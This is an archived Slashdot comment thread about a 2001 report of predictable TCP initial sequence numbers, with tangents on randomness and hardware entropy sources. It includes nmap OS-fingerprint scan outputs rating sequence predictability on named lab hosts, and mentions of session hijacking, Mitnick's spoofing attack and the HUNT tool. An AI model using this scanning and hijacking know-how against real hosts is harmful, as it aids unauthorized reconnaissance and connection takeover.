too. guessing a tcp sequence isnt *THAT* hard... (Score:3) A simple run on a freebsd 4.2 box yields: [1:37pm] root # nmap -O boris Starting nmap V. 2.53 by fyodor@insecure.org ( ) Interesting ports on boris.ST.HMC.Edu (134.173.xxx.xxx): (The 1513 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 80/tcp open http 110/tcp open pop-3 111/tcp open sunrpc 143/tcp open imap2 587/tcp open submission 3306/tcp open mysql TCP Sequence Prediction: Class=random positive increments Difficulty=17911 (Worthy challenge) note: random positive increments Now, the same scan on a win2k box yields: [1:40pm] root # nmap -O skittles Starting nmap V. 2.53 by fyodor@insecure.org ( ) Interesting ports on skittles.ST.HMC.Edu (134.173.xxx.xxx): (The 1518 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 80/tcp open http 81/tcp open hosts2-ns 139/tcp open netbios-ssn 3306/tcp open mysql TCP Sequence Prediction: Class=trivial time dependency Difficulty=2 (Trivial joke) Remote operating system guess: Windows NT4 / Win95 / Win98 Thus, guessing tcp sequences isnt entirely difficult for windows 9x boxen, its just that its generally easier to exploit other problems than play with tcp stacks. Re:Randomness does not exist. (Score:2) Usually it's quite sufficient to feed your pseudo-random generator a new seed every few minutes. Actually, even that is usually overkill, but now we're getting to the practical rather than truly random. Caution: Now approaching the (technological) singularity. Re:I see *you've* never taken measure theory (Score:2) 1 cup water + 1 cup alcohol 2 cups 50% alcohol in water. (Perhaps it's 1 3/4 cup of fluid, something like that.) 1 cloud + 1 cloud = 1 cloud 300 degrees + 61 degrees = 1 degree (angular) And there's also something about a maximum temepature where the scale falls apart because the particles are at relativistic speeds. I'm sure that there are other cases, but those are the only ones that occur off hand. In each case we wiggle the definition so that normal addition rules don't have to apply. OTOH, 1 apple + 1 orange = 2 pieces of fruit. So you can add apples and oranges. Caution: Now approaching the (technological) singularity. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2) Or it could have something to do with the fact that DHMO is otherwise known as water. ObJectBridge [sourceforge.net] (GPL'd Java ODMG) needs volunteers. Re:"Old as the Hills" (Score:2) The www does NOT mean the internet, the two terms are NOT interchangeable, despite what "Wired" magazine insists. Re:Looks like a pretty standard case to me. (Score:4) And yes, you can assume the connection in any case if you are on the cable or in a direct path where you naturally see the traffic in both directions. I had fun one evening (yes, it's that easy) modifying my linux box (486dx50 running 0.99pl15 at the time) to "flash establish" a socket and assume the telnet session from my mac. Re:Random Numbers (Score:3) [fourmilab.ch] The guy has a geiger-muller tube pointed at a radioactive source. The time between detected events is random. Really random. -- #include "stdio.h" Re:Random Numbers (Score:3) I don't know which side of the argument you were on, but whoever said it is "impossible" is really really wrong. It's actually quite trivial. More importantly, it's rarely useful to argue about the difference between a truly random and a pseudo-random number. This TCP story is one of the vast number where good pseudo-random numbers are plenty adequate. -- Re:Random Numbers (Score:2) It doesn't have to be truly random, it just has to be random enough to provide the required level of unpredictability. As long as the TCP numbers are random enough that this attack is no longer the easiest attack to make, or else that an attack on the randomness carries X level of difficulty (time, space, etc.), then your numbers are good enough in the real world. This is probably doable on a router, especially if you add custom HW to sample entropy from the environment. simlar security hole in *every* os (Score:3) (taco, your lameness filter sucks) SERIOUS VULNERABILTY AFFECTS ALL VERSIONS OF UNIX AND WINDOWS A serious vulnerability has been found in all versions of Unix and Windows. This problem most likely affects all other systems as well. It has been found that computer systems must be physically moved prior to installation at a computing facility. Moreover, when these systems are transported, they are usually moved at some point by human beings. Obvious insecurity Inc. has found that a serious DOS attack can be waged on these systems when attackers stand on top of a building high above the area where a system is being moved at the proper time interval. The attackers toolkit consists of a long range flamethrower, a large sledgehammer, and concussion grenades. If the attacker has perfect timing, they may drop the sledgehammer/light the flamethrower/drop the grenade onto the target system in question, thereby creating a DOS condition. This scenario can be spread easily through a coordinated attack, but this has yet to be seen in the wild. Vendors have been notified 1.5 minutes ago, but have so far proven that they are incompetent by not releasing patches or sending a reply to our email. Therfore, in the interests of full disclosure, we are making these shocking results public, since YOU have a right to know. This earth shaking, trend setting vulnerability has been discovered by Obvious Security Inc. We hope to overwhelm bugtraq and the other lists with our skills so we can make more money and have more prestige in the computer security industry. Remember - "Just because it's right in your face, does not mean that it's obvious". Obvious Security Inc. Bulletin #2600 Re:Random Numbers (Score:4) I actually had a rather lengthy argument with my computer sciences teacher about this -- it is impossible to generate a truely random number. Actually, IIRC, SGI did this using digitized photos of lava lamps as seeds. It is kind of like trying to prove something can't be done. Come now. Mathematicians do it all the time. Re:Random Numbers (Score:5) They pointed a web cam at a lava lamp(!). The pictures are the hash source for the random number generator. Their theory was something like, "What could be more random then a Lava Lamp?!" Here's a link [sgi.com] to something similar but I won't say it's -the- one I'm talking about since I honestly cant remember where I saw it originally. "Me Ted" Whatever (Score:2) Let me get this straight. (Score:2) Hello? When was this not known? Tell us something we don't know! Linux for instance uses random positive increments. No number is truly random, but many are "random enough". That is to say, it's Really Hard to predict the port number, hard enough that trying some other vounerability would be more rewarding. This is a non-story. Hackers and security experts have known about this so long that many have probably forgotten it several times by now. All this muckrake serves to do is alarm the chicken littles. Fun with NMAP TCP Sequence Prediction. (Score:4) ---- My Windows 2000 Pro box w/SP1 TCP Sequence Prediction: Class=random positive increments Difficulty=11993 (Worthy challenge) Remote operating system guess: Windows 2000 RC1 through final release ---- My Linux box (RedHat 7.0, all updates) TCP Sequence Prediction: Class=random positive increments Difficulty=5472011 (Good luck!) Remote operating system guess: Linux 2.1.122 - 2.2.14 ---- On of work's retired NT4 servers TCP Sequence Prediction: Class=trivial time dependency Difficulty=4 (Trivial joke) Remote operating system guess: Windows NT4 / Win95 / Win98 Our WatchGuard firewall returns a dificulty of 9999999. --- Randomness does not exist. (Score:3) Yes, it's incredibly difficult to generate random numbers. Isn't it impossible? Consider this. ALL events can theoretically be traced back to a specific cause. If you ask a human to give a random number between 1 and 10, the outcome is a result of many psychological factors that predisposed that person to respond with a certain number. Likewise, if you were to go back to the beginning of the universe, and move a few molecules, you'd change the outcome. Therefore, how can anything be truly random. We can have unexpected outcomes, but if you look at the big picture, you can trace results back to causes. So, to put this on topic, in reference to your second point... it's difficult to generate random numbers - especially on computers. :-) However, we CAN generate psuedo-random numbers. *chuckle* A matter of perspective (Score:2) But, for the purpose of cryptography, what's important is perspective. That is, from any given perspective (ie: the user which is trying to predict the next number in a sequence), if the next number cannot be determined (because information which led to that number is unavailable, such as seed generated from keyboard interrupts), the data can be considered truly random. I mean - technically nothing can ever be absolute (we can't be sure 1+1==2; we've just observed it throughout all of recorded history) so long as time is not infinite (which is also difficult to prove ;). So, if we are going to round up probabilities to absolutes, randomness is best considered from a specific perspective (in which case we can say, for someone, "this data is truly random"). -- All men are great before declaring war Re:Random Numbers (Score:5) So, yes, I have RTFM (RTFS?) in this case (and before this article was ever posted, which should give me bonus points). The time between the interrupts caused by my keypresses and mouse movements is random. PGP for DOS used this fact directly, however modern operating systems provide their own sources of random bits based on the same principle. Note that devices that measure radioactive decay can be easily hooked up to the Linux random number generator. :-) --- The Hotmail addres is my decoy account. I read it approximately once per year. Re:Randomness does not exist. (Score:2) All is not lost, however. Quantum mechanics, for instance, (if you believe it) shows that the randomness behind subatomic particle motion (like electrons in their orbits) and the like demonstrates a sort of 'deep cosmic chaos.' Thus, for instance, the decay of radioactive stuff is truly unpredictable, so it's not impossible to come up with numbers that are both random and unpredictable. Re:Random Numbers (Score:2) It's an academic point. Re:Is this really a problem? (Score:2) Because it's been fixed for quite a while in most OSes. There are still some [securiteam.com] exceptionally stupid OSes that are vulnerable to it, but nobody who knows beans about security uses them. - Use of the media (Score:2) Version without big-ass ad (Score:5) Re:Random Numbers (Score:3) radioactive decay random-number generator [fourmilab.ch] atmospheric noise random-number generator [random.org] --Blair "Nineteen billion bits can't be wrong!" Alarming number of articleizements (Score:2) -- Greg Solution: (Score:2) -- Looks like a pretty standard case to me. (Score:4) Way to go guys! Before, I didn't who you were. Now I know you're a complete bunch of retarded chimpanzees! Re:Random Numbers (Score:2) With a sufficient number of hosts connecting the numbers you get back should be about as random as you can get. Hey, I could even charge a micropayment each time somebody connects. Anybody interested in a new '.com' venture ? Re:Random Numbers (Score:2) I think you may have missed the point of your CS teacher's argument. Yes, it is impossible to generate a truly random number using a simple mathematical formula. That's why these are all referred to as "pseudo-random number generators." The numbers they produce look random, but if you continue to generate numbers using the same function, it will eventually repeat itself. However, it is possible to design random number generators that can actually generate random numbers. /dev/random on Linux is an example of this. It samples the times of the user's keypress and mouse movements (actually the time specific interrupts occured, but its basicly the same thing) along with other random sources to produce real random numbers. There is also specialized hardware that will listen to atmospheric noise and background radiation to producte random numbers as well. Now, back to the point of this topic: TCP sequence number prediction. As someone else has already pointed out, this vulnerablity has been known about (and fixed) since 1996. The above mentioned /dev/random device has been used internally by the TCP/IP stack in Linux to generate cryptographically secure random initial sequence numbers for some time now. --- The Hotmail addres is my decoy account. I read it approximately once per year. Re:Is this really a problem? (Score:3) It has been... Mitnick used it, in fact, to get rootshell via rshd, which does authentication via ip adressing, which you can spoof using the TCP sequence attack. Kspett Re:automation K1DD33z (Score:2) Should read: Security hole in some IMPLEMENTATIONS (Score:2) My guess would be that someone out there found a particular implementation that had this problem and from there, started asking questions about if the problem exists in other implementations. If the TCP protocol standard specifies that the ISN needs to be 'random', or at least a good psudorandom, than this is a failure of the implementation if it does not follow that spec, NOT a statement that 'TCP', as a protocol, has a security hole. Re:Proving something can't be done (Score:2) Re:Randomness does not exist. (Score:5) > to a specific cause. Pardon???? That's true in the newtonian universe, but not at lower levels. At the quantum level, things are fundamentally random, and the "hidden numbers theory" has long fallen out of fashion. I don't know enough about thermal processes, but radioactive decay is, in thoery,purely stochastic--there are no causal variables and deviations from the mean number of decay evnts *must* be purely random. hawk, once a physcist Re:Is this really a problem? (Score:2) A bit of digging found the tool HUNT [fsid.cvut.cz] which exploits the problem. Re:Which other protocols *also* have holes? (Score:2) SMB is a security hole! -- Re:"Old as the Hills" (Score:5) Microsoft: That vulnerability is completely theoretical l0pht: Making the theoretical practical since 19XX RFC1948 (Score:5) Other important news (Score:2) Re:NITROGEN WARNING is similar to TCP/IP warning (Score:2) Ah, but how would we know it's the real Bruce Perens speaking to us? - Re:Not that Theoretical - Mitnick did just this (Score:2) And yeah, that was a few years ago. Re:NITROGEN WARNING is similar to TCP/IP warning (Score:3) #include "disclaim.h" "All the best people in life seem to like LINUX." - Steve Wozniak Re:"Old as the Hills" (Score:2) Is this really a problem? (Score:2) if the ISN is not chosen at random or if it is increased by a non-random increment in subsequent TCP sessions, an attacker could guess the ISN OK, so there is a random number known only by either end of a TCP session. If the number is not random, then a hacker could guess the number and spoof packets. Two questions - 1) if this "problem" has been around since the mid-80's why has it never been exploited? 2) How hard can it possibly be to generate a random number, even for a simple OS installed in a router? This problem to me seems to be a non-problem, but you networking gurus might have a different story. Re:Is this really a problem? (Score:2) -------- automation K1DD33z (Score:2) Or maybe it's a vieled attempt by Microsoft to discredit TCP/IP so they can get the whole world to switch back to NetBEUI and WINS. Which other protocols *also* have holes? (Score:3) Even Linux 2.1.53 had a massive TCP/IP-stack hole, so we know we're not invulnerable. This isn't just a problem for others. FRAUD (Score:3) Anyway, this company has "discovered" that if ( a big if) you can predict the ISN of a remote host you can (gasp!) hijack/spoof a TCP connection. Gee, I think I heard about that in 1985. This was on ZDnet this morning and they have since changed their story to reveal just how old and well known this really is. I know there was 1989 paper on this exact subject by AT+T, try searching for it. Also, try using nmap on any host today. See how it says "truly random" for many many of them (including linux), that is why this vulnerability means nothing in practice. Practically every OS under the sun has good enough random ISN's that no one is going to correctly guess them. This is just another security firm trying to get some contracts by issuing a big scary press release. Please.
https://slashdot.org/story/01/03/12/1830224/security-hole-in-tcp
CC-MAIN-2018-13
refinedweb
5,872
64.41
Robot Fusion11/06/2016 at 10:38 • 0 comments So I never actually made that board from the last log. But remember #Tote HaD, those robots that we have built at Hackaday Belgrade? I have spent a considerable amount of time designing that PCB, and it has a couple of Easter eggs in there. On of them is that unpopulated pin header in the lower right corner: Turns out that you can put a female pin header in there: And then, instead of plugging that ESP8266 module in the usual socket, you can plug a Raspberry Pi Zero in there: The power from the LiPo is only between 3.7 and 4.2V, but turns out that this is enough for the pi -- its regulator will switch into a low-voltage mode, and everything works: Next, I will just need to take the MicroPython code I used on the original, and touch it up to run on regular Python on the pi, with the SMBus library for the I²C communication. Everything in One?02/11/2016 at 12:38 • 0 comments o I haven't done much work on this during the week, but I did do some thinking, and the results of that are pretty scary. First, I realized that using Servo Blaster and all those pins is not really that convenient, when I can simply have a #Servo Controller from a Pro Mini. Second, while Pi Zero is cheap, a WiFi dongle and SD Card for them are not. ESP8266 is cheap, though, and you can do #RPi WiFi with it. Can't really do much about the SD Card, apart from using a cheap, small one. Anyways, putting it all together, I got something like this: It has room for ESP8266, Pro Mini and Pi Zero, 12 servo sockets, IR sensor socket, and a voltage regulator module. I had to use both sides of the PCB with surface pads, and the RPi header doesn't quite fit on the 5cm board, but that's details. How would you use this? There are three options. Only put a Pro Mini there, and you have the simple version of #Tote with remote control. Add a ESP8266 with the right firmware, talking to the Pro Mini over I²C, and you have a Micropython or Lua-based robot with WiFi. Finally, add a voltage regulator and Pi Zero, and you have a perambulating computer, with WiFi over ESP8266 and possibly a USB camera. Will this work? I honestly have no idea. I cobbled this PCB together over several evenings, stealing ideas that I don't fully understand all over Hackaday. It does, however, sound like the right way forward. Face02/07/2016 at 20:25 • 0 comments I also needed to figure out a way to attach the camera to the robot in a robust way. So I drilled some holes in the plastic that holds it, and screwed that to the Pi Zero: This is with just the camera connected to the USB. But for development it's nice to have both the camera and WiFi, so I repurposed that two-port hub I had, and made an alternate cable: Of course googly eyes are very important too! Camera02/07/2016 at 13:40 • 0 comments Today I worked a little bit on adding a camera to Tote Zero. Most of this I have already done for #Pico-Kubik quadruped robot, but I thought I will do a more detailed write-up. I started by digging up from my junk pile an old camera module from a laptop. You can usually find those in electronic junk, or, failing that, buy them as spare parts for a dollar or two. Mine looked something like this: Next I opened it and extracted the actual sensor: The cable has a plug, for convenience. I took my ohm-meter, and checked which cables are connected to the ground. In this case it was the green one, and, of course, the shielding -- the first two pins. The rest is easy: orange and red are D+ and D-, and black is VCC. In this cable, black and brown cables are connected to the same pin. Once I knew which cable is which, I used a piece of 1.27mm pin header to connect that to a normal USB cable: Then I needed a way to test it. I didn't feel like risking frying my laptop, so instead I took a raspberry pi and some cheap USB hub, and used that: The camera enumerated nicely. Here's an excerpt from dmesg: [ 3875.068666] usb 1-1.4: new high-speed USB device number 45 using dwc_otg [ 3875.176718] usb 1-1.4: New USB device found, idVendor=174f, idProduct=5a31 [ 3875.176759] usb 1-1.4: New USB device strings: Mfr=2, Product=1, SerialNumber=3 [ 3875.176779] usb 1-1.4: Product: USB 2.0 Camera [ 3875.176798] usb 1-1.4: Manufacturer: Sonix Technology Co., Ltd. [ 3875.176815] usb 1-1.4: SerialNumber: SN0001 [ 3875.190376] uvcvideo: Found UVC 1.00 device USB 2.0 Camera (174f:5a31) [ 3875.205832] input: USB 2.0 Camera as /devices/platform/soc/20980000.usb/usb1/1-1/1-1.4/1-1.4:1.0/input/input17 And here is lsusb: Bus 001 Device 045: ID 174f:5a31 Syntek Sonix USB 2.0 Camera Bus 001 Device 003: ID 148f:7601 Ralink Technology, Corp. Bus 001 Device 002: ID 1a40:0101 Terminus Technology Inc. 4-Port HUB Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Then I installed motion and tried the camera with it. I had to modify the configuration to make the stream available outside of localhost. Otherwise, it just worked: Unfortunately, motion has quite a bit of a lag, and if I wanted to use the streaming for controlling the robot remotely, that would be unacceptable. So I decided to try mjpegstreamer. There is a simple tutorial on installing mjpegstreamer on Raspberry Pi. Of course instead of using files as input, I used input_uvs.so plugin: ./mjpg_streamer -i 'plugins/input_uvc/input_uvc.so -r 160x100 -fps 20 -y -q 40' -o 'plugins/output_http/output_http.so -w www' With such a low resolution and quality, the streaming is quite fluent! I noticed, that the camera module is getting quite warm while working. @Arsenijs suggested, that those laptop modules, while pretty much normal USB devices, expect lower voltage than the usual 5V. I will have to try and power it from Pi's 3.3V power and see how it works then. I also made a plug for the Pi Zero, to save some space: That should work, but then I can't have the WiFi dongle. I guess I will need to look into making Tote Zero compatible with the #RPi WiFi pants (or even add the ESP8266 to Tote's PCB). Update: I made a smaller cable for the Pi Zero: While that makes it impossible to use the WiFi dongle, I can still use OpenCV with this camera to make the robot analyze what it sees and actually do something fun. First Walk01/27/2016 at 14:00 • 0 comments So today I figured out which servo is on which leg, rebuilt the legs to make the coxas longer, trimmed all servos again, added pieces of rubber tube as feet, and replaced the battery with a larger one. I also adjusted the voltage to be exactly 5V (it was 5.2V for some reason), hopefully that will make this thing heat less. Finally, I made some small fixes and adjustment to the code, and lo and behold, we have a walking robot! It's still not perfect, of course, but at last it works. One Step Forward, Two Steps Back01/26/2016 at 22:55 • 0 comments Today I finally adapted all the code for IK and walking, and realized that practically everything I did yesterday is wrong. First, the cheap WiFi dongle that I soldered to the mini-hub is really bad. It gets hot and eats enough current to make the Pi Zero restart when the servos move. I had to switch to console over serial. Second, before you laboriously trim all the servos to the right positions, make sure the new servo library that you wrote takes the same range of angles as the old one. In this case, the old one took -90° to 90°, and the new one takes 0° to 180°. The result is that all the servos are wrong by 90° and I have to redo the trimming. Of course the board has a tendency to restart when all the servos are switched on simultaneously anyways, so I had to add some code that switches them one by one, with some delays. Nothing new here, old #Tote had the same thing, and it's a good idea anyways. I still have to figure out which pins are for servos on which legs -- I didn't keep track of that when connecting them, and I figured it would be easier to just go one by one in software and see which leg moves. Hopefully I can get the first walk by the end of the month. Single-port USB Hub01/25/2016 at 21:36 • 1 comment In order to make working on the robot a little bit easier, I added a small USB hub that I had lying around, with a cheap WiFi card soldered to it. This way I have access to the board and still can use a single USB port for, say, a webcam. Otherwise the progress has been slow. I adjusted and trimmed the servos, so that the robot can stand in the "zero" position, but I still haven't tested the inverse kinematics or walking code. Fixed Board01/07/2016 at 21:49 • 0 comments After some cosmetic touches, I'm finally happy enough with the first version of the PCB for this robot. It looks something like this: The Fritzing file is in the repository, and the Gerber is available for download. I used a new approach for the servo sockets -- since the Pi Zero is going to be plugged as a second layer, we don't really have enough space for the usual servo sockets. So I used one long header with angled pins -- the servos plug in two rows into that, fitting between the Pi and the board. Other than that, the board has the serial and I²C pins broken out, and also a header for all the pins that are not used for controlling servos. There is also a jumper in there, for disconnecting the servo power from the Pi -- so that we can power the two from two different sources if we need to. The usual holes, as in Tote, are for attaching the servo horns for the legs. Servo Blaster01/07/2016 at 20:47 • 0 comments So I have the robot assembled pretty much the way I wanted -- the PCB as the body, a XM1584-based voltage regulator for steady 5V to the Pi and to servos, capacitor, power switch, 2S LiPo battery. Nothing fancy, really. I have no voltage monitoring this time, because the Pi doesn't have an ADC that I could use (I might add one in the future versions), so I have to be careful about the battery use. I also have the Servo Blaster, the daemon I'm using to generate PWM signal for the servos, all installed and configured, and I have a simple Python class to use it: import math class Servo(object): def __init__(self, servos, index, reverse=False, trim=0): self.servos = servos self.index = index self.reverse = reverse self.trim = trim def move(self, radians=None, degrees=None): self.servos.move(self.index, radians, degrees, self.reverse, self.trim) class Servos(object): min_pos = 600 max_pos = 2400 unit = 4 # us max_servos = 12 pos_range = 180 def __init__(self): self.device = open('/dev/servoblaster', 'w') def __getitem__(self, index): return Servo(self, index) def move(self, servo, radians=None, degrees=None, reverse=False, trim=0): if degrees is None: degrees = math.degrees(radians) degrees += trim if reverse: degrees = self.pos_range - degrees position = self.min_pos + (degrees * self.pos_range / (self.max_pos - self.min_pos)) position = min(self.max_pos, max(self.min_pos, position)) output = position / self.unit self.device.write("{}={}\n".format(servo, output)) def update(self): passNow it's time for my favorite pastime (not): figuring out the order, orientation and trims for all the servos. Once I have that, I expect my code for the PyBoard to basically work -- which means that I should have the basic creep gait. For now, I can move each of the servos individually, while the robot lies on its back, with a wifi dongle connected for control: Off By One Servo Plug01/05/2016 at 16:59 • 0 comments Mistakes in PCB design happen, and usually hurt when you receive your fabricated PCB. I was in a hurry to send the Tote Zero's PCB to fabrication before Christmas, so that I can receive it when I come back from the holidays. And as you can guess, I made a mistake. Instead of making the servo headers GVSGVSGVSGVS... (that's ground-voltage-signal), I made them VSGVSGVSGVSG... What now? Of course, I will eventually order another PCB (especially since this one doesn't have all the extra pins of Pi Zero broken out, and they may come in handy later for sensors or extra servos), but for now I would like to be able to test other aspects of my robot, so that the next design includes any fixes and ideas I come with. So I really want to use this board as it is. I could "fix" this by disassembling the plugs of the servos, and changing the order of wires in them. In fact, it's not a lot of work, even for a dozen servos. But from my experience, sooner or later I will forget about this, and either connect an un-modified servo, or use those modified servos for something else and release the magic blue smoke. I'd prefer to avoid this. So instead I plugged the servos offset by one pin, and glued additional pins in front for the one plug that sticks out and misses its ground pins (the additional pins are red): It's not pretty, but it will do for now. I also fixed my PCB design files already, so that I don't forget about it.
https://hackaday.io/project/9065/logs
CC-MAIN-2021-43
refinedweb
2,427
71.55
Author: Miguel Sofer <[email protected]> State: Draft Type: Project Vote: Pending Created: 01-Oct-2006 Post-History: Tcl-Version: 8.7 Tcl-Branch: tip-284 Abstract This TIP exposes a Tcl script-level interface to the direct command invokation engine already present in the Tcl library for years. Proposed New Commands This TIP proposes a new subcommand to namespace, invoke, with the following syntax: namespace invoke namespace cmd ?arg ...? This invokes the command called cmd in the caller's scope, as resolved from namespace namespace, with the supplied arguments. If namespace does not exist, the command returns an error. This TIP also proposes a new command: invoke level cmd ?arg ...? This invokes the command cmd in level level with the supplied arg_uments. The syntax of _level is the same as that required by uplevel. Rationale There is currently no script-level equivalent to Tcl_EvalObjv(), though the functionality is provided by one of: eval [list cmd ?arg ...?] {*}[list cmd ?arg ...?] Note that the core tries to optimise the first case, but has to be careful to only avoid reparsing when it is guaranteed safe to do so. The notation is rather clumsy too. The proposed new commands try to improve this situation, with the added functionality of determining the namespace in which the command name is to be resolved (functionality which was very difficult to use previously using the script-level API). In this manner it is possible for the invocation to make good use of namespace path and namespace unknown features. The new command invoke could be implemented as: proc invoke {level args} { if {[llength $args] == 0} { return -code error SomeMessage } if {[string is integer $level] && ($level >= 0)} { incr level } uplevel $level $args }] Reference Implementation and Documentation RFE 1577324 (which depends on Patch 1577278) provides an implementation of namespace invoke. Differences to Other Commands Both these commands perform command invocation, as opposed to the script evaluation done by eval, uplevel, namespace eval and namespace inscope namespace inscope does a magic expansion of the first argument, namespace invoke takes the first argument as a command name. In other words, namespace inscope can be used with a command prefix. Feedback on the semantics suggest that this is a worthy feature, very useful for packing up command prefixes. This tip may yet be revised or withdrawn to take that into consideration. Both namespace eval and namespace inscope add a call frame,namespace invoke does not - it invokes in the caller's frame. Sample Usage In tcllib's ::math::calculus::romberg we see (edited for brevity): # Replace f with a context-independent version set fqname [uplevel 1 [list namespace which [lindex $f 0]]] set f [lreplace $f 0 0 $fqname] ... set cmd $f lappend cmd [expr {0.5 * ($a + $b)}] set v [eval $cmd] where the command name in the prefix f is replaced with its fully qualified name. A further variable is lappended, and the result is sent to eval. With namespace invoke and invoke this would be coded as: set ns [invoke 1 namespace current] set f [list namespace invoke $ns {*}$f] ... set v [{*}$f [expr {0.5 * ($a + $b)}]] If both new commands took the cmd argument as a prefix to be expanded (as suggested by some early commenters), it would be even nicer for this usage: set ns [invoke 1 [list namespace current]] set f [list namespace invoke $ns $f] ... set v [invoke 0 $f [expr {0.5 * ($a + $b)}]] The same thing (with slightly different semantics and a performance cost due to script evaluation instead of command invocation) could be obtained today by doing: set f [uplevel 1 [list namespace code [list uplevel 1 $f]]] ... set v [eval [lappend f [expr {0.5 * ($a + $b)}]]] In order to fully reproduce the semantics and performance it would have to be: set f [uplevel 1 [list namespace code [list uplevel 1 $f]]] ... lset f end end [linsert [lindex $f end end] end [expr {0.5 * ($a + $b)}]] set v [eval $f] This document has been placed in the public domain.
https://core.tcl-lang.org/tips/doc/trunk/tip/284.md
CC-MAIN-2021-21
refinedweb
669
59.43
Learning Java coding is, of course, thrilling. And after hands-on experience in writing a few sample snippets, you’re all set to showcase your creativity! You have downloaded popular IDEs and tools to help you compile and validate your java code. You’re coding, doing back-and-forth to make things work and everything works perfectly fine for you. But the compiler you’re using just crashes. It’s irritating, isn’t it? Well, we cannot do anything about it. You must be thinking about what if there is any other way-out to get your work done without getting to search, downloading and playing with new java compiler. Today, there are many online java compilers available to help you get rid of conventional and old-fashioned compilers. Since there enormous online java compilers available, it is hard to find which one will work best for you. A few are quite simple and offers basic features while others are offering advanced features. So, which one to go for? To help you out we had compiled a list of must-have online java compilers to help you compile and develop error-free code. Let’s take a quick look at each of them. CompileJava If you want to have something very simple to compile the code, then this is the right online compiler for you. Compilejava.net not only helps you compile the code but also help you executing and even lets you edit the java code online on the go. All you have to do is to copy and paste your java code to the online console and you are done! It will compile the code for you. You can see the test results online within a moment. One of the major benefits of this online tool is that you don’t have to mention any filename while compiling the code. It will parse the code, locate a public class and name it accordingly for the compiler. Moreover, you can also declare multiple public classes in a single editor. This online compiler is available since past 5 years. One of the best things about this online compiler is that you don’t have to pay anything to use it, it is totally FREE! And everyone loves free stuff. Ideone Talking about the most comprehensive and practical online compiler, Ideaone.com can be the best choice for you. It is one of the rarest online compilers that allow running more than 60 programming languages on the go. Source code download, viewing public code, and syntax highlighting are the key features that grab the attention of many developers. One of the most interesting features of this online compiler it that it provides an API for compilation as a service. This means you can build your own IDE, which you can use on your website. The only concern could be its limitation to support Java 9. It is yet not updated to let you compile or debug the code written in Java 9. Codiva Even though it is quite a newbie in the world of online compilers, Codiva has managed to grab attention from many developers around the world. And the reason behind this is its compelling features. The USP of Codiva is it starts compiling the very next moment you type the code in the compiler box, parses the compilation errors and displays the output in the editor before you complete the code in it! Isn’t it cool? Another interesting feature is its ability to auto-complete the code you are entering in the editor. Aside to these two cool features, it also brings ample support to multiple files and packages. If you want, you can also define your own custom file names. Moreover, you can also leverage from various learning programs run on Codiva. Also, it is the only online compiler available which is mobile-friendly. This means you can use it anytime and anywhere using your smartphone too. JDoodle It is one of the early online compilers available for the developers. Initially launched with the intention to target Java language, JDoodle today supports more than 70 different programming languages. Like CompileJava.net, it doesn’t require any file name specification. It does it while parsing the file contents internally. One feature that makes it different than rest of the online java compilers is its amazing terminal support for running various interactive programs. You can play around interactive and non-interactive mode based on the project requirements. Browxy If you ever searched for the online java compilers, you would come to know that Browxy.com stands one of the most popular online compiler and excellent java editor till date. The reason behind this is its user-friendly interface that makes java code compiling quite easy and a fun activity for the stressed developers. All you have to do is to create your account with Browxy.com and you’re done! You can compile the code anytime you want by logging into the website. It also serves the purpose of code repository for the newbie developers by allowing you to store your java code snippet and make it available for rest of the registered users to learn. Rextester Started with the concept of testing regular expression, Rextester has grown immensely as an online code compiler and editor today. It is used to compile code written in Java, C, C++ and 27 other programming languages. One of its interesting features is that it gives you an option to select between multiple editors based on your preference. When it comes to sharing, Rextester brings the amazing feature to let the users share the URL and multiple users can tweak it simultaneously and that too without any hiccups. But the only limitation with this amazing online tool is that it only supports a single file, which is usually named rextester. Also, the class defined should also not be made public. Final Verdict So, that’s all about the popular online java compilers available over the internet. Instead of relying on the conventional desktop tools to compile your java code, you can simply use any of these popular online editors. And that too without any hurdles of installation and troubleshoots or license. Do you know any other online java compilers? Share your thoughts in the comments below
https://opensourceforu.com/2018/09/top-5-java-compilers-every-developer-should-use-in-2018/
CC-MAIN-2019-43
refinedweb
1,053
64.41
void subpt_c ( ConstSpiceChar * method, ConstSpiceChar * target, SpiceDouble et, ConstSpiceChar * abcorr, ConstSpiceChar * obsrvr, SpiceDouble spoint [3], SpiceDouble * alt ) Deprecated: This routine has been superseded by the CSPICE routine subpnt_c. This routine is supported for purposes of backward compatibility only. Compute the rectangular coordinates of the sub-observer point on a target body at a particular epoch, optionally corrected for planetary (light time) and stellar aberration. Return these coordinates expressed in the body-fixed frame associated with the target body. Also, return the observer's altitude above the target body. FRAMES PCK SPK TIME GEOMETRY Variable I/O Description -------- --- -------------------------------------------------- method I Computation method. target I Name of target body. et I Epoch in ephemeris seconds past J2000 TDB. abcorr I Aberration correction. obsrvr I Name of observing body. spoint O Sub-observer point on the target body. alt O Altitude of the observer above the target body. method is a short string specifying the computation method to be used. The choices are: "Near point" The sub-observer point is defined as the nearest point on the target relative to the observer. "Intercept" The sub-observer point is defined as the target surface intercept of the line containing the observer and the targetPOINT" is valid.. This routine assumes that the target body is modeled by a tri-axial ellipsoid, and that a PCK file containing its radii has been loaded into the kernel pool via furnsh_c. et is the epoch in ephemeris seconds past J2000 at which the sub-observer point on the target body is to be computed. abcorr indicates the aberration corrections to be applied when computing the observer-target state. `abcorr' may be any of the following. "NONE" Apply no correction. Return the geometric sub-observer point on the target body. "LT" Correct for planetary (light time) aberration. Both the state and rotation of the target body are corrected for light time. "LT+S" Correct for planetary (light time) and stellar aberrations. Both the state and rotation of the target body are corrected for light time. of spkezr_c for a discussion of precision of light time corrections. Both the state and rotation of the target body are corrected for light time. "CN+S" Converged Newtonian light time correction and stellar aberration correction. Both the state and rotation of the target body are corrected for light time.. spoint is the sub-observer point on the target body at `et' expressed relative to the body-fixed frame of the target body. The sub-observer point is defined either as the point on the target body that is closest to the observer, or the target surface intercept of the line from the observer to the target's center; the input argument `method' selects the definition to be used. The body-fixed frame, which is time-dependent, is evaluated at `et' if `abcorr' is "NONE"; otherwise the frame is evaluated at et-lt, where `lt' is the one-way light time from target to observer. The state of the target body is corrected for aberration as specified by `abcorr'; the corrected state is used in the geometric computation. As indicated above, the rotation of the target is retarded by one-way light time if `abcorr' specifies that light time correction is to be done. alt is the "altitude" of the observer above the target body. When `method' specifies a "near point" computation, `alt' is truly altitude in the standard geometric sense: the length 